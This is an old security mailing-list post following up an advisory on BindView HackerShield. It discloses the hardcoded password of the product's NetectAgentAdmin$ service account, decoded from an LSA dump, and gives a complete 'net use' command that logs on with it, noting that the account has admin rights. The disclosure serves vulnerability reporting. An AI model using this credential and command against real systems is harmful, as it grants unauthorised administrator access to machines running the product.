Date: Wed, 15 Sep 1999 18:40:53 -0700
From: Eric Schultze <ews@SECURITYFOCUS.COM.>
To: [email protected]Subject: Bindview Hackershield Password
This is a follow up to Simple Nomad's BindView HackerShield Advisory
Dumping the LSA password for the NetectAgentAdmin$ service, we get the
following hex codes:
6E 00 70 00 37 00 6D 00 34 00 71 00 4D 00 31 00
4D 00 37 00 56 00 54 00 09 00 3D 00
which equates to :
np7m4qM1M7VT<tab>=
The thirteenth character, a tab, makes this a difficult password to enter
from GUI applications. It's best to resort to command line to logon with
the username/password combo
net use \\172.16.1.101\ipc$ "np7m4qM1M7VT ="
/user:172.16.1.101\netectagentadmin$
"the CL above may be wrapped.)
NOTE: this account has admin privileges.
This information has been updated to the vulnerability record at:
http://www.securityfocus.com/bid.628.html
--eric
